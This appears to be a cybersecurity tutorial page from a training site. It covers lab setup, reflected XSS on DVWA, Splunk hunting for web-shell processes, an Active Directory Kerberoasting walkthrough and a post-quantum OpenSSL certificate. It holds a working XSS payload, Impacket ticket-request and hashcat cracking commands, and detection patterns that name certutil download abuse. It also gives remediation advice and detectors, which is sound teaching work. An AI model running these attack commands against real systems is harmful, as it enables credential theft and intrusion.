Step-By-Step Guides

Cybersecurity Tutorials

Hands-on, walk-through tutorials with precise steps, command snippets, and difficulty levels. Follow along and build real-world security skills.

Beginner

Setting Up Your Kali Linux & Virtual Hacking Lab

Learn how to configure an isolated, safe virtualized environment to practice offensive hacking safely and legally.

🛠️ Requirements & Tools: VirtualBox 7.0+, Kali Linux installer ISO, Metasploitable 2 VM, minimum 8GB RAM
1

Install VirtualBox and Extensions

Download and run the VirtualBox installer for your OS. Be sure to also download and install the **VirtualBox Extension Pack** to enable full USB device and network interface driver capabilities.

2

Create the Kali Linux Virtual Machine

Open VirtualBox, click **New**, and specify the following configurations:

  • Name: Kali-Pentester
  • Type: Linux, **Version:** Debian (64-bit)
  • Base Memory: 4096MB (4GB)
  • Processors: 2 vCPUs
  • Virtual Disk: Create a virtual hard disk (VDI) of 30GB (dynamically allocated)

In **Settings** > **Storage**, attach your Kali Linux ISO to the virtual optical drive, then launch the VM and proceed with the standard graphical installation.

3

Configure the Host-Only/NAT Network

To keep your hacking lab safely isolated from your main home network while allowing internet access inside VMs for updates, configure two network adapters in both VMs:

  • Adapter 1: NAT (For internet connection to update tools)
  • Adapter 2: Host-Only Adapter (e.g., `vboxnet0` - for safe, isolated VM-to-VM interaction)

4

Import and Launch Metasploitable 2

Download the Metasploitable 2 ZIP, extract it, and import the `.vmdk` file into VirtualBox as a new Linux virtual machine. In **Settings** > **Network**, attach it **only** to the Host-Only Adapter (Adapter 2): the VM is intentionally and extremely vulnerable, so it must never be reachable from the internet.

Run both VMs and verify connectivity by pinging Metasploitable from Kali:

ping -c 4 <metasploitable_host_only_ip>
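As an added check that is not part of the guide, the Python snippet below parses `ip -o -4 addr` output captured on Kali and confirms that the Metasploitable address sits on the host-only network before any tool is pointed at it. The interface names, the sample output, the 10.0.2.0/24 NAT range and the 192.168.56.0/24 host-only range are VirtualBox defaults and assumptions here:

```python
import ipaddress
import re

# Constructed sample of `ip -o -4 addr` from the Kali VM (assumed addresses:
# VirtualBox NAT defaults to 10.0.2.0/24, vboxnet0 to 192.168.56.0/24).
SAMPLE_IP_ADDR = """\
1: lo    inet 127.0.0.1/8 scope host lo
2: eth0    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic eth0
3: eth1    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth1
"""

# Assumed host-only range; check yours under File > Host Network Manager.
HOST_ONLY_NET = ipaddress.ip_network("192.168.56.0/24")

LINE_RE = re.compile(r"^\d+:\s+(\S+)\s+inet\s+(\S+)")


def parse_ip_addr(output):
    """Map interface name -> IPv4Interface for each `ip -o -4 addr` line."""
    ifaces = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            ifaces[m.group(1)] = ipaddress.ip_interface(m.group(2))
    return ifaces


def check_lab_isolation(ip_addr_output, target_ip, host_only_net=HOST_ONLY_NET):
    """Return a list of problems; an empty list means the layout matches the guide:
    Kali has an interface on the host-only network and the target lives there too."""
    problems = []
    ifaces = parse_ip_addr(ip_addr_output)
    if not any(i.network == host_only_net for i in ifaces.values()):
        problems.append("no interface on host-only network %s" % host_only_net)
    target = ipaddress.ip_address(target_ip)
    if target not in host_only_net:
        problems.append("target %s is not on the host-only network %s" % (target, host_only_net))
    return problems


if __name__ == "__main__":
    print(check_lab_isolation(SAMPLE_IP_ADDR, "192.168.56.102"))  # []
    print(check_lab_isolation(SAMPLE_IP_ADDR, "10.0.2.4"))        # one problem
```
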
Beginner

Finding and Exploiting Your First Cross-Site Scripting (XSS)

A deep dive into intercepting HTTP requests, discovering reflective XSS entry points, and executing basic scripts.

🛠️ Requirements & Tools: Burp Suite Community, DVWA hacking lab, Firefox browser
1

Configure Burp Suite Interceptor Proxy

Launch Burp Suite, click **Temporary Project** > **Use Burp Defaults**, and head to the **Proxy** tab. Ensure intercept is turned **ON**. Open the built-in Burp Browser or configure your Firefox proxy extensions (like FoxyProxy) to point to `127.0.0.1:8080` so all web requests flow through Burp.

2

Locate Reflected XSS Page

Navigate to your DVWA login page inside your lab. Log in with credentials `admin` / `password`. In the sidebar, set **DVWA Security Level** to **Low**, then select **Reflected XSS** from the vulnerabilities list.

3

Input Injection and Trace Reflection

In the input field where it asks "What is your name?", input a harmless string like `vexorion-testing` and click Submit. Inside Burp Suite, click **Forward** to release the request, or locate the request under **Proxy** > **HTTP History**.

Examine the raw response. Search for `vexorion-testing` in the response HTML to check whether the input is reflected directly inside the page markup without sanitization or HTML encoding.

4

Inject & Trigger Payload

Since the reflection is raw, input the following basic JavaScript payload into the name box:

<script>alert('XSS Exploit Successful by Vexorion Learn')</script>

Click **Submit**. The browser will immediately interpret the raw reflection as code, prompting a popup box displaying your message. You have successfully executed a client-side attack!
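Added example, not from the guide or from DVWA's own code: the reflection modelled in Python, once as the Low-security page behaves and once with the fix, HTML-encoding the value before it reaches the response. The wrapping `<div>` is an assumption; DVWA's real markup differs.

```python
import html

# The exact string the guide submits in the "What is your name?" box, and the benign probe.
PAYLOAD = "<script>alert('XSS Exploit Successful by Vexorion Learn')</script>"
BENIGN = "vexorion-testing"


def render_vulnerable(name):
    """Reflects the parameter into the HTML verbatim, as DVWA does at Security Level Low.
    The <div> wrapper is assumed for this example."""
    return "<div>Hello " + name + "</div>"


def render_fixed(name):
    """Same response, but the value is HTML-encoded first (quote=True also encodes
    ' and "), so the browser shows the payload as text instead of executing it."""
    return "<div>Hello " + html.escape(name, quote=True) + "</div>"


def reflected_unencoded(name, page):
    """The check from step 3: does the submitted string appear in the response
    byte-for-byte, meaning a <script> tag would survive as real markup?"""
    return name in page


if __name__ == "__main__":
    for name in (BENIGN, PAYLOAD):
        for render in (render_vulnerable, render_fixed):
            print(render.__name__, reflected_unencoded(name, render(name)), render(name))
```
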

Intermediate

Threat Hunting with Splunk: Catching Suspicious Processes

Build real-world Blue Team skills by querying Windows Sysmon events to detect active reverse shell attempts.

🛠️ Requirements & Tools: Splunk Enterprise, Windows Sysmon, Kali Linux (attacker)
1

Configure Sysmon on Windows Target

Download Sysmon from Microsoft Sysinternals and install it with a well-regarded configuration profile such as SwiftOnSecurity's sysmon-config template (`-accepteula` skips the licence prompt for unattended installs):

sysmon.exe -accepteula -i sysmonconfig-export.xml

This configures Windows Event Logging to capture process creations (Event ID 1) and network connections (Event ID 3) in detail.

2

Ingest Events into Splunk

Install the Splunk Universal Forwarder on the Windows target, or upload the Windows Event Log (`Microsoft-Windows-Sysmon/Operational`) directly into your Splunk indexer with sourcetype `XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`.

3

Write the SPL Hunt Query

A classic attacker footprint is a command prompt or PowerShell launched silently from an unusual parent process (such as Microsoft Word or a web server worker). In Splunk Search, run this SPL query:

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| search ParentImage IN ("*\\w3wp.exe", "*\\httpd.exe", "*\\nginx.exe", "*\\winword.exe", "*\\excel.exe")
| search Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\powershell_ise.exe")
| table _time host ParentImage Image CommandLine

4

Analyze the Results

Review the returned table. If a web service (`w3wp.exe`) spawned a command-line interpreter (`cmd.exe`) containing commands like `whoami` or `certutil -urlcache -f`, you have caught a live exploit/web shell execution attempt. Standard alert rules can now be generated from this search.
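Added example, not part of the guide: the same hunt logic in Python, run over constructed Sysmon Event ID 1 records using the field names Splunk extracts, so the parent/child lists can be tested before they become an alert. Hosts, timestamps and command lines are made up; matching is case-insensitive like SPL's `IN` with wildcards.

```python
from fnmatch import fnmatchcase

# Same pattern lists as the SPL query in step 3.
SUSPICIOUS_PARENTS = ["*\\w3wp.exe", "*\\httpd.exe", "*\\nginx.exe", "*\\winword.exe", "*\\excel.exe"]
SHELL_CHILDREN = ["*\\cmd.exe", "*\\powershell.exe", "*\\powershell_ise.exe"]
# Command-line fragments step 4 names as signs of a live web shell.
SUSPICIOUS_COMMANDS = ["whoami", "certutil -urlcache -f"]

# Constructed Sysmon records (EventCode 1 = process create, 3 = network connect).
SAMPLE_EVENTS = [
    {"_time": "2024-01-01T10:00:01Z", "host": "WEB01", "EventCode": 1,
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"_time": "2024-01-01T10:00:05Z", "host": "WEB01", "EventCode": 1,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
    {"_time": "2024-01-01T10:02:00Z", "host": "WKS07", "EventCode": 1,
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c certutil -urlcache -f http://example.invalid/a.txt a.txt"},
    {"_time": "2024-01-01T10:02:01Z", "host": "WKS07", "EventCode": 3,
     "ParentImage": "", "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": ""},
]


def _matches_any(value, patterns):
    v = value.lower()
    return any(fnmatchcase(v, p.lower()) for p in patterns)


def hunt_suspicious_children(events):
    """Python equivalent of the SPL hunt: Event ID 1 where a web-server or Office
    parent spawned a command interpreter. Each hit lists which step-4 indicators
    appear in its CommandLine (empty list = lineage alone triggered it)."""
    hits = []
    for ev in events:
        if ev.get("EventCode") != 1:
            continue
        if not _matches_any(ev["ParentImage"], SUSPICIOUS_PARENTS):
            continue
        if not _matches_any(ev["Image"], SHELL_CHILDREN):
            continue
        cmd = ev.get("CommandLine", "").lower()
        hit = {k: ev[k] for k in ("_time", "host", "ParentImage", "Image", "CommandLine")}
        hit["indicators"] = [s for s in SUSPICIOUS_COMMANDS if s in cmd]
        hits.append(hit)
    return hits
```
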

Advanced

Active Directory Kerberoasting Attack Walkthrough

Learn how to exploit Kerberos ticket architecture to extract service account password hashes offline.

🛠️ Requirements & Tools: Kali Linux VM, Impacket suite, Hashcat, Active Directory domain access
1

Understanding the Attack Vector

Kerberoasting targets Active Directory accounts that have a registered Service Principal Name (SPN). Any authenticated domain user can request a Kerberos service ticket (TGS) for any service. The ticket is encrypted with the service account's password hash. We can extract this ticket and crack the password hash offline.

2

Query AD & Request Service Tickets

Using a standard domain credential, run Impacket's `GetUserSPNs.py` script from Kali Linux. This tool queries LDAP for accounts with SPNs and automatically requests the TGS tickets:

python3 GetUserSPNs.py -request -dc-ip 192.168.1.100 corp.local/domain_user:password123 -outputfile kerb_hashes.txt

This saves the encrypted service tickets in a format that Hashcat can parse.

3

Set Up Offline Brute-Force Cracking

Move the `kerb_hashes.txt` file to your GPU cracking rig or launch Hashcat locally. Run Hashcat targeting mode **13100** (Kerberos 5, TGS-REP etype 23) using a robust dictionary like `rockyou.txt`:

hashcat -m 13100 -a 0 kerb_hashes.txt /usr/share/wordlists/rockyou.txt

4

Remediation Strategies

To defend against Kerberoasting:

  • Ensure all service accounts have complex, randomized passwords of 25+ characters.
  • Transition critical services to Group Managed Service Accounts (gMSA), which rotate passwords automatically.
  • Monitor event logs for high volumes of TGS requests with RC4 encryption (Event ID 4769).
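Added example for the third remediation point, not from the guide: a detector over constructed Event ID 4769 records that flags an account requesting many distinct SPNs with RC4 (TicketEncryptionType 0x17) inside a short window, which is what the `GetUserSPNs.py -request` run in step 2 produces. The threshold, the window and the sample records are assumptions to tune for your domain.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in Event ID 4769
# Assumed thresholds for this example; tune them against your domain's baseline.
MAX_RC4_SERVICES = 3
WINDOW = timedelta(minutes=5)

# Constructed 4769 records: (TimeCreated, TargetUserName = requesting account,
# ServiceName = SPN owner, TicketEncryptionType). 0x12 is AES256.
SAMPLE_4769 = [
    ("2024-01-01T09:00:00", "domain_user", "svc_sql", "0x17"),
    ("2024-01-01T09:00:01", "domain_user", "svc_http", "0x17"),
    ("2024-01-01T09:00:01", "domain_user", "svc_backup", "0x17"),
    ("2024-01-01T09:00:02", "domain_user", "svc_ftp", "0x17"),
    ("2024-01-01T09:00:03", "domain_user", "krbtgt", "0x12"),
    ("2024-01-01T09:30:00", "alice", "svc_sql", "0x12"),
    ("2024-01-01T09:31:00", "alice", "svc_http", "0x17"),
]


def find_kerberoast_candidates(events, max_services=MAX_RC4_SERVICES, window=WINDOW):
    """Group RC4 TGS requests by requesting user and report every user who asked
    for more than `max_services` distinct SPNs with etype 0x17 within `window`.
    Returns {user: sorted list of the SPN accounts requested in that burst}."""
    by_user = defaultdict(list)
    for ts, user, service, etype in events:
        if etype.lower() == RC4_HMAC:
            by_user[user].append((datetime.fromisoformat(ts), service))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        # Sliding window anchored at each request in turn.
        for i, (start, _) in enumerate(reqs):
            burst = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(burst) > max_services:
                alerts[user] = sorted(burst)
                break
    return alerts


if __name__ == "__main__":
    print(find_kerberoast_candidates(SAMPLE_4769))
```
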

Advanced

Migrating to Post-Quantum SSL Certificates (CRYSTALS-Kyber)

Be future-ready. Compile OpenSSL with quantum-safe provider libraries and generate Kyber cryptographic keys.

🛠️ Requirements & Tools: Ubuntu 22.04+ VM, liboqs library, OpenSSL 3.x, OQS provider, CMake & GCC compiler
1

Build liboqs (Open Quantum Safe Library)

Clone and build `liboqs`, which contains C implementations of the NIST post-quantum cryptographic algorithms:

git clone https://github.com/open-quantum-safe/liboqs.git
cd liboqs && mkdir build && cd build
cmake -DBUILD_SHARED_LIBS=ON -DCMAKE_INSTALL_PREFIX=/usr/local ..
make -j$(nproc)
sudo make install

2

Compile OQS OpenSSL Provider

To hook up these quantum algorithms to OpenSSL, clone and build the `oqs-provider`:

git clone https://github.com/open-quantum-safe/oqs-provider.git
cd oqs-provider && mkdir build && cd build
cmake -DOPENSSL_ROOT_DIR=/usr -DCMAKE_INSTALL_PREFIX=/usr/local ..
make
sudo make install

3

Verify OpenSSL Post-Quantum Providers

Edit `/etc/ssl/openssl.cnf` to load the `oqsprovider` module, or pass it explicitly with `-provider oqsprovider` as below. Test the setup by listing the quantum-safe algorithms it exposes:

openssl list -signature-algorithms -provider oqsprovider
openssl list -kem-algorithms -provider oqsprovider

You should see **kyber512**, **kyber768**, **kyber1024** and **dilithium** algorithms successfully listed.

4

Generate PQC Kyber Keypair & Certificate

Generate a post-quantum keypair using **Kyber-768** (NIST's primary recommended standard) and create a self-signed post-quantum SSL certificate. Note that Kyber is a key-encapsulation mechanism (KEM): it is used for the TLS key exchange and cannot produce signatures, so the certificate itself must be signed with a post-quantum signature key such as Dilithium, which `oqsprovider` also supplies:

# Generate a Kyber-768 keypair (a KEM: used for key exchange, it cannot sign)
openssl genpkey -algorithm kyber768 -provider oqsprovider -provider default -out kyber768_priv.key

# A certificate needs a signature key, so generate a Dilithium-3 key for it
openssl genpkey -algorithm dilithium3 -provider oqsprovider -provider default -out dilithium3_priv.key

# Create a self-signed post-quantum certificate valid for 365 days, signed with Dilithium-3
openssl req -new -x509 -key dilithium3_priv.key -provider oqsprovider -provider default -out pq_cert.crt -days 365 -subj "/CN=pqc-test.vexorion.com"

Congratulations! You have generated a certificate secure against future quantum computers.